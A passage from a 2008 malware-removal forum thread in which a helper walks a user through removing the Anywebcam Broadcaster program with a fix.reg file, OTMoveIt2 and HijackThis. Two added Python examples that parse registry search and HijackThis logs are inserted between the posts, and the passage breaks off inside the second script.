Player.exe|Mozilla/4.0\\DSAgnt.exe|Mozilla/4.0\\dxwsetup.exe|Mozilla/4.0\\EmailMarketingDirector4.exe|Mozilla/4.0\\EXCEL.EXE|Mozilla/4.0\\Explorer.EXE|Mozilla/4.0\\fds.exe|Mozilla/4.0\\FIFA08.exe|Mozilla/4.0\\firefox.exe|Mozilla/4.0\\forumsecrets.exe|Mozilla/4.0\\GameDrvr.exe|Mozilla/4.0\\googletalk.exe|Mozilla/4.0\\GoogleToolbarNotifier.exe|Mozilla/4.0\\HelpHost.exe|Mozilla/4.0\\IBP.exe|Mozilla/4.0\\IEXPLORE.EXE|Mozilla/4.0\\IMVUClient.exe|Mozilla/4.0\\jre-6u2-windows-i586-p-iftw_7070c3f7.exe|Mozilla/4.0\\jre-6u3-windows-i586-p-iftw_2cd32978.exe|Mozilla/4.0\\jre-6u5-windows-i586-p-iftw_1b121abb.exe|Mozilla/4.0\\mbam.exe|Mozilla/4.0\\Metacafe.exe|Mozilla/4.0\\msnmsgr.exe|Mozilla/4.0\\msohelp.exe|Mozilla/4.0\\MSTORDB.EXE|Mozilla/4.0\\MSTORE.EXE|Mozilla/4.0\\paltalk.exe|Mozilla/4.0\\POWERPNT.EXE|Mozilla/4.0\\realplay.exe|Mozilla/4.0\\RecordingManager.exe|Mozilla/4.0\\redlightcenter.exe|Mozilla/4.0\\RunDll32.exe|Mozilla/4.0\\Scrabble-WT.exe|Mozilla/4.0\\selfpub1.exe|Mozilla/4.0\\setup_wm.exe|Mozilla/4.0\\SiteMapMaker.exe|Mozilla/4.0\\SoftwareUpdate.exe|Mozilla/4.0\\SopCast.exe|Mozilla/4.0\\svchost.exe|Mozilla/4.0\\temp0.exe|Mozilla/4.0\\The Rise of Atlantis.exe|Mozilla/4.0\\thought1.exe|Mozilla/4.0\\TVUPlayer.exe|Mozilla/4.0\\update.exe|Mozilla/4.0\\WinBej2-WT.exe|Mozilla/4.0\\WINWORD.EXE|Mozilla/4.0\\wmplayer.exe|Mozilla/4.0\\x.exe|Mozilla/4.0\\YahooMessenger.exe|Mozilla/4.0\\YahooMusicEngine.exe|Mozilla/4.0\\YAHOOM~1.EXE|Mozilla/5.0\\Explorer.EXE|Mozilla/5.0\\firefox.exe|Mozilla/5.0\\Safari.exe|MOZILLA/5.0\\SiteMapMaker.exe|Mozilla/5.0\\YahooWidgetEngine.exe|MSDW\\dwwin.exe|MSDW\\wmplayer.exe|MusicNet HttpConnector 3.9.0.3009\\YahooMusicEngine.exe|Nero StartSmart\\NeroStartSmart.exe|NOD32 Update\\nod32krn.exe|NSIS_InetLoad\\toolbar.exe|NSIS_INETLOAD\\widgetsus.4.0.5.0x184b.nobundle.exe|NSIS_INETLOAD\\widgetsus.exe|NSISDL/1.2\\DivXComponentInstaller.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\firefox.exe|NSPlayer/11.0.5721.5145 
WMFSDK/11.0\\iexplore.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\SopCast.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\TVUPlayer.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\wmplayer.exe|NSPlayer/11.0.5721.5145\\firefox.exe|NSPlayer/11.0.5721.5145\\iexplore.exe|NSPlayer/11.0.5721.5145\\redlightcenter.exe|NSPlayer/11.0.5721.5145\\wmplayer.exe|On2 Technologies URL Access\\MsiExec.exe|OpenOffice.org 2.3\\soffice.BIN|OpenUrl\\paltalk.exe|Opera/9.24\\Explorer.EXE|Opera/9.24\\Opera.exe|PalTalk Installer Download\\install_Paltalk.exe|PCU\\Corel Snapfire.exe|PlaxoAimUpgrade\\aim6.exe|PostMEGAUPLOADTOOLBAR\\IEXPLORE.EXE|Python-urllib/2.4\\MDirect.exe|Python-urllib/2.5\\IMVUClient.exe|QuickTime/7.2\\firefox.exe|QuickTime/7.2\\QuickTimePlayer.exe|QuickTime/7.3.1\\firefox.exe|QuickTime/7.3.1\\QuicktimePlayer.exe|QuickTime/7.3\\firefox.exe|QuickTime/7.4.1\\firefox.exe|QuickTime/7.4.1\\QuickTimePlayer.exe|QuickTime/7.4.5\\firefox.exe|QuickTime/7.4.5\\QuickTimePlayer.exe|QuickTimeWinInet\\firefox.exe|RD 2.2.1.30\\autoupgrade.exe|RD 2.2.1.30\\TVUPlayer.exe|RMA/1.0\\firefox.exe|RMA/1.0\\RealPlay.exe|RMA/1.0\\RecordingManager.exe|RNSetup\\temp0.exe|RootEXE\\action.exe|RPInstaller\\xpinstall.exe|RTPatch Auto Update\\Launcher.exe|SC/201 0 3e752a03:0:0 Windows\\iexplore.exe|SC/201 0 3e752e17:0:0 Windows\\SopCast.exe|SC/201 1004 3e752e18:10109:8902 Windows\\iexplore.exe|SC/201 1009 3e75353f:13469:8902 Windows\\iexplore.exe|SC/201 101100 3e752aa1:11559:8902 Windows\\iexplore.exe|SC/201 101100 3e752aa1:6384:8902 Windows\\iexplore.exe|SC/201 101100 3e752aa1:8345:8902 Windows\\iexplore.exe|SC/201 11910 3e752efd:6515:8902 Windows\\SopCast.exe|SC/201 11910 3e75353f:8760:8902 Windows\\SopCast.exe|SC/201 22508 3e752e17:10573:8902 Windows\\iexplore.exe|SC/201 33767 3e752a3f:8230:8902 Windows\\iexplore.exe|SC/201 34250 3e752e17:6437:8902 Windows\\iexplore.exe|SC/201 34250 3e752e17:7404:8902 Windows\\iexplore.exe|SC/201 3606 3e753666:6767:8902 Windows\\iexplore.exe|SC/201 43343 3e752a84:5579:8902 
Windows\\iexplore.exe|SC/201 6001 3e7533ab:10445:8902 Windows\\iexplore.exe|SC/201 6029 3e7533ab:10445:8902 Windows\\iexplore.exe|SC/201 6816 3e753666:13819:8902 Windows\\iexplore.exe|SCAgent\\Explorer.EXE|SearchWithGoogle\\GoogleToolbarNotifier.exe|session name\\firefox.exe|SfMarket\\Forge80.exe|Shareaza 2.2.3.0\\Shareaza.exe|Shareaza 2.2.5.0\\Shareaza.exe|Shareaza 2.3.1.0\\Shareaza.exe|Shareaza\\Shareaza.exe|Shockwave Flash\\aim6.exe|Shockwave Flash\\Dreamweaver.exe|Shockwave Flash\\firefox.exe|Shockwave Flash\\Fireworks.exe|Shockwave Flash\\Flash.exe|Shockwave Flash\\Safari.exe|Skype™ 3.0\\Skype.exe|SL CDDB 2.0\\YahooMusicEngine.exe|SL CDDB 2.0\\ymusicid.exe|SopCast Utils\\iexplore.exe|SopCast Utils\\SopCast.exe|SRL\\firefox.exe|StubInstaller\\temp0.exe|Sygate Personal Firewall Service\\smc.exe|talkback/1.0; Win32\\aolload.exe|Total Uninstall\\Tu.exe|Update\\SopAdver.exe|Update_Detector\\UpdateDetector.exe|User-Agent: Mozilla/5.0\\firefox.exe|VCSoapClient\\hpzwup01.exe|Viper\\realplay.exe|Windows Installer\\msiexec.exe|Windows Live Setup 2.0\\Install_WLMessenger.exe|Windows-Media-Player/11.0.5721.5145\\firefox.exe|Windows-Media-Player/11.0.5721.5145\\wmplayer.exe|Windows-Media-Player/11.0.5721.5230\\firefox.exe|Windows-Media-Player/11.0.5721.5230\\iexplore.exe|Windows-Media-Player/11.0.5721.5230\\wmplayer.exe|Windows-Update-Agent\\firefox.exe|Windows-Update-Agent\\svchost.exe|WinInetRequest 1.0\\YahooMusicEngine.exe|Wise\\GLB2142.tmp|Wise\\GLB2705.tmp|Xenu Link Sleuth 1.2j\\Xenu.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Popular\Broadcaster]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"c:\\program files\\anywebcam\\Broadcaster.exe"="Broadcaster"

; End Of The Log...

#15 TheJoker (Forum Deity, Boot Camp Mod, 14,352 posts)

Posted 19 June 2008 - 05:09 PM

Please run Notepad and paste the following text in the Code box into a new file:

REGEDIT4
[-HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Popular\Broadcaster]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"c:\\program files\\anywebcam\\Broadcaster.exe"=-
Save the file to the desktop as fix.reg and make sure the "Save as Type" field says "All Files". Then please go to the desktop and double-click on fix.reg, and click Yes to merge it with the registry.

Please download OTMoveIt2 by OldTimer.
  • Save it to your desktop.
  • Please double-click OTMoveIt2.exe to run it.
  • Copy the file path below to the clipboard by highlighting it and pressing CTRL + C (or, after highlighting, right-click and choose Copy):

    C:\Program Files\anywebcam

  • Return to OTMoveIt2, right click in the "Paste List of Files/Folders to be Moved" window (on the left side) and choose Paste.
  • Click the red Moveit! button.
  • Copy everything in the Results window (under the green bar) to the clipboard by highlighting ALL of them and pressing CTRL + C (or, after highlighting, right-click and choose copy), paste it into a new Notepad file, save it to your Desktop as OTMoveIt2.txt, and paste it in your next reply.
  • Close OTMoveIt2
If a file or folder cannot be moved immediately you may be asked to reboot the machine to finish the move process. If you are asked to reboot the machine choose Yes.

Please post a new HijackThis log, the log from OTMoveIt2, and note any errors encountered.
Does your problem continue?

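As an added example (not code from the thread, from Registry Search or from OTMoveIt2), the following Python script does mechanically what the fix.reg above does by hand: it parses a RegSearch-style log like the one in the previous post, emits [-key] for keys that belong to the program, emits "name"=- for the MUICache entry where only the value name points at the program, and leaves the Eset key alone because the match there is only inside NOD32's own UserAgentList data. The sample log is constructed and abridged, and helper names such as plan_removal and render_fix_reg are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in Registry Search's .reg-style output format (abridged
# from the log posted above; the long NOD32 UserAgentList value is shortened).
SEARCH_OUTPUT = r"""Windows Registry Editor Version 5.00

; Registry Search 2.0 by Bobbi Flekman
; Results for strings: 'anywebcam' 'broadcaster'

[HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\avatar7]
"Broadcaster.AllowCapture"="False"

[HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\Broadcaster]

[HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\Modules\Imon\Settings]
"UserAgentList"="Broadcaster/3.0\\Broadcaster.exe|Mozilla/4.0\\firefox.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Popular\Broadcaster]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"c:\\program files\\anywebcam\\Broadcaster.exe"="Broadcaster"

; End Of The Log...
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
# "name"=data; the name keeps its .reg escaping so it can be re-emitted verbatim
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def parse_reg(text):
    """Parse .reg-style text into {key_path: [(value_name, raw_data), ...]}.
    The header, ';' comments, '@=' defaults and hex(...) continuation lines
    are skipped: only key paths, value names and one-line data are needed."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.rstrip()
        if not line or line.startswith(";"):
            continue
        if (m := KEY_RE.match(line)):
            current = m.group(1)
            keys.setdefault(current, [])
        elif current is not None and (m := VALUE_RE.match(line)):
            keys[current].append((m.group(1), m.group(2)))
    return keys


def _topmost_matching_key(path, terms):
    """Shortest prefix of `path` whose last component contains a term, or None."""
    parts = path.split("\\")
    for i, part in enumerate(parts):
        if any(t in part.lower() for t in terms):
            return "\\".join(parts[: i + 1])
    return None


@dataclass
class RemovalPlan:
    delete_keys: list = field(default_factory=list)    # emitted as [-KEY]
    delete_values: dict = field(default_factory=dict)  # key -> [value names]
    review: list = field(default_factory=list)         # left alone; check by hand


def plan_removal(keys, terms, min_depth=3):
    """Delete keys that are the program's own, delete just the value where a
    value *name* points at the program (MUICache), and only flag keys where
    the term occurs inside another product's data (NOD32's UserAgentList)."""
    terms = [t.strip().lower() for t in terms]
    plan = RemovalPlan()
    for path, values in keys.items():
        top = _topmost_matching_key(path, terms)
        if top is not None:
            if len(top.split("\\")) < min_depth:
                plan.review.append(path)  # never emit [-HIVE] or [-HKLM\SOFTWARE]
            elif top not in plan.delete_keys:
                plan.delete_keys.append(top)  # subkeys collapse into the parent
            continue
        names = [n for n, _ in values if any(t in n.lower() for t in terms)]
        if names:
            plan.delete_values[path] = names
        elif any(t in d.lower() for _, d in values for t in terms):
            plan.review.append(path)  # deleting this key would break that product
    return plan


def render_fix_reg(plan):
    """REGEDIT4 syntax: [-key] deletes a whole key, "name"=- deletes one value."""
    lines = ["REGEDIT4"] + [f"[-{key}]" for key in plan.delete_keys]
    for key, names in plan.delete_values.items():
        lines.append(f"[{key}]")
        lines += [f'"{name}"=-' for name in names]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    plan = plan_removal(parse_reg(SEARCH_OUTPUT), ["anywebcam", "broadcaster"])
    print(render_fix_reg(plan), end="")
    print("; review by hand:", plan.review)
```

On the constructed sample the rendered output is exactly the five-line fix.reg in the post above, and the Eset key is reported for manual review rather than deleted.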


#16 a_fahmy7 (Advanced Member, Full Member, 109 posts)

Posted 19 June 2008 - 10:00 PM

No rebooting was required.
The program shortcut and listing in Start > Programs is still there, but the program folder is gone from C:\Program Files. And when I click the Broadcaster shortcut, Windows tries to search for the exe file and can't find it, of course :D Good news??

Also, I restarted Windows and no error messages appeared.



Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:55:18 AM, on 6/20/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp Drive Defrag Service (TuneUp.Defrag) - TuneUp Software GmbH - C:\WINDOWS\System32\TuneUpDefragService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 10610 bytes


OTMoveIt2:


C:\Program Files\anywebcam\Design\panels moved successfully.
C:\Program Files\anywebcam\Design\buttons moved successfully.
C:\Program Files\anywebcam\Design\backgrounds moved successfully.
C:\Program Files\anywebcam\Design moved successfully.
C:\Program Files\anywebcam moved successfully.

OTMoveIt2 by OldTimer - Version 1.0.4.2 log created on 06202008_055235

Edited by a_fahmy7, 19 June 2008 - 10:51 PM.


#17 TheJoker (Forum Deity, Boot Camp Mod, 14,352 posts)

Posted 19 June 2008 - 11:31 PM

The program shortcut and listing in Start > Programs is still there

Click on Start > Programs, locate the program group or shortcut for Broadcaster, right-click on it and select Delete.

Now you need to run HijackThis and click "Do a system scan only." Place a check next to the following entries (if they are still there):

R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)


Now close all browser and other windows except for HijackThis, and click "Fix Checked" to have HijackThis fix the entries you checked.

Open OTMoveIt2 and click the CleanUp! button on top.
In the left pane, it will display a list of tools and other related files which you may have downloaded/used during our cleanup along with backup folders that were created with the bad files present. They are not needed anymore, so OTMoveIt2 will delete them.
The program needs to download the list of tools, so if your firewall says that OTMoveIt2 is attempting to access the Internet, you need to allow it.
Do not edit anything in that Window!
Don't worry if it displays some tools you didn't download/use.
Click Yes when it asks to Begin cleanup process.
Then reboot your computer when finished.

How is everything now?

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-2010 and ASAP Member since 2005
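The entries TheJoker asks to have fixed are the ones HijackThis marks "(no file)" or "(file missing)": a registry hook or service that still points at a file that no longer exists. The Python below is an added example, not code from the thread or from HijackThis, that parses a log in this format and lists those orphaned entries, and also surfaces the O17 (NameServer) and O20 (AppInit_DLLs) lines a helper would normally double-check, since the first decides which DNS servers the machine uses and the second loads a DLL into every GUI process. The sample log is constructed from entry lines of the same shape as the log posted above; the paths, CLSIDs and addresses in it are copied from that log purely as sample input.

```python
"""Triage a HijackThis log for the kinds of entries flagged in this thread.

Added example; it is not part of the thread and not code from HijackThis.
SAMPLE_LOG is constructed from entry lines of the same shape as the log
posted above. Paths, CLSIDs and addresses are copied from the thread's log
purely as sample input.
"""
import re
from dataclasses import dataclass

SAMPLE_LOG = r"""
Logfile of Trend Micro HijackThis v2.0.2
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
"""

# A HijackThis entry line starts with its section code (R0-R3, F0-F3, N1-N4, O1-O24).
ENTRY_RE = re.compile(r"^(?P<section>[RFNO]\d+) - (?P<body>.*)$")
# Markers HijackThis prints when the referenced file does not exist on disk.
ORPHAN_MARKERS = ("(no file)", "(file missing)")
NAMESERVER_RE = re.compile(r"NameServer = ([\d.,]+)")


@dataclass
class Finding:
    section: str
    reason: str
    line: str


def parse_entries(log_text):
    """Yield (section, body, raw line) for every entry line; skip header and process list."""
    for raw in log_text.splitlines():
        line = raw.strip()
        m = ENTRY_RE.match(line)
        if m:
            yield m.group("section"), m.group("body"), line


def orphaned_entries(log_text):
    """Entries whose target file is gone: the ones a helper tells you to 'Fix checked'."""
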